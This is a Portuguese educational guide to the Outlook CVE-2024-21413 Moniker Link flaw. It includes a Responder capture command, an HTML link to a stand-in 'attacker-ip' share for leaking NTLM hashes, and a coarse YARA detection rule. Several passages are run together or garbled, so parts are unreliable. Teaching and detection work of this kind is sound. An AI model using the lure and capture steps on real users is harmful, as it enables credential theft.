
Guia educacional sobre CVE-2024-21413, a vulnerabilidade Outlook zero-click Moniker Link, cobrindo fluxo de ataque, captura de credenciais NTLM, detecção com YARA e estratégias de mitigação.
CVE-2024-21413, comumente referida como a vulnerabilidade Moniker Link, é uma falha de segurança crítica no Microsoft Outlook que permite que atacantes vazem credenciais de usuários sem exigir qualquer interação.
Ao contrário dos ataques de phishing tradicionais, esta vulnerabilidade pode ser desencadeada simplesmente ao visualizar um e-mail, tornando-a particularmente perigosa em ambientes corporativos.
O problema decorre de como o Outlook processa links moniker, causando tentativas de autenticação não intencionais para sistemas controlados pelo atacante.
Entender os seguintes conceitos é essencial:
Um mecanismo específico do Windows que permite que aplicativos referenciem recursos externos usando protocolos como:
file://unc://\\servidor-atacante\compartilhamento
Usado para acessar recursos compartilhados em uma rede. Nesta vulnerabilidade, é abusado para forçar solicitações de autenticação.
A Exibição Protegida do Outlook foi projetada para isolar conteúdo potencialmente inseguro. Esta vulnerabilidade contorna essa proteção, permitindo o acesso a recursos externos.
Criação do Payload
file://servidor-atacante/compartilhamento) dentro de um e-mail.Entrega
Acionamento
Processamento Automático
Solicitação de Autenticação
Exposição de Credenciais
[Attacker]
|
| 1. Send crafted email
v
[Victim Outlook]
|
| 2. Auto-process moniker link
v
[Windows System]
|
| 3. NTLM authentication attempt
v
[Attacker Server]
|
| 4. Capture NTLM hash
v
[Credential Abuse / Lateral Movement]
⚠️ Realize apenas em ambientes de laboratório controlados
sudo responder -I eth0
<a href="file://attacker-ip/share">Open Document</a>
[SMB] NTLMv2 Hash captured
User: victim
Uma regra de detecção foi desenvolvida por Florian Roth para identificar tentativas de exploração envolvendo links moniker.
rule Outlook_MonikerLink_CVE_2024_21413
{
meta:
description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
author = "Florian Roth"
reference = "CVE-2024-21413"
strings:
$a = "file://"
$b = "\\\\"
condition:
any of them
}
file:// e baseados em UNCCVE-2024-21413 demonstra como comportamentos do sistema profundamente integrados (como autenticação automática) podem ser explorados através de entradas aparentemente inofensivas, como links de e-mail.
💡 Recomendação: Reproduza esta vulnerabilidade em um laboratório virtual (ex.: VM Windows + VM atacante) para entender completamente a cadeia de ataque e as estratégias defensivas.